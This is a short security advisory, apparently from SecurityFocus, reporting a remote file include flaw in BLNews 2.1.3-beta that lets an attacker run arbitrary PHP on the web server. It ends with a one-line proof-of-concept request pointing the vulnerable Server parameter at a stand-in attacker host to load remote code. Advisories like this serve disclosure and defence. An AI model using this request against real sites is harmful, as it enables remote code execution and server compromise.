7 lines
No EOL
532 B
Text
7 lines
No EOL
532 B
Text
source: http://www.securityfocus.com/bid/7677/info
|
|
|
|
It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.
|
|
|
|
This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected.
|
|
|
|
http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org |